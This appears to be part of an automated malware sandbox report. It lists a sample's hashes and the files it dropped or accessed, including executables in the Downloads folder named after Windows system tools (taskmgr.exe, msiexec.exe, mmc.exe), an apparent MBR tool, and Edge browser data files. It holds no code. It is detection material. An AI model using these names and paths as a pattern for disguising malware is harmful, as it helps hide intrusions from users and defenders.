SHA1ad6020612c27b62c0e590459c4f36aaf2ed7c138
SHA256dd585d49302ad327220f0bd5d682f83498a501539a9ff1057f2a9c993ddc723b
SHA512430cafa8b002e2d6041c4ac74f8588f6436659a48fe063abbe6e38d440ed04ca795fd001a296b83bc9476c76feabd22dae4da8e557e468abbd909fa905e7717c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (Filesize: 16B)
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (Filesize: 16B)
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize: 8KB)
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize: 8KB)
-
C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat (Filesize: 4KB)
-
C:\Users\Admin\Downloads\user.bmp (Filesize: 7KB)
-
C:\Users\Admin\downloads\colorcmd.exe (Filesize: 122KB)
-
C:\Users\Admin\downloads\mbr.exe (Filesize: 47KB)
-
C:\Users\Admin\downloads\mmc.exe (Filesize: 116KB)
-
C:\Users\Admin\downloads\msiexec.exe (Filesize: 210KB)
-
C:\Users\Admin\downloads\screenmelt.exe (Filesize: 116KB)
-
C:\Users\Admin\downloads\taskmgr.exe (Filesize: 139KB)
-
C:\Users\Admin\downloads\winnt64.exe (Filesize: 188KB)
-
C:\Users\Admin\downloads\winntcus64.png (Filesize: 135KB)
-
C:\Users\Public\Desktop\ISEEYOU6.prsnlz (Filesize: 73B)
-
\??\PIPE\lsarpc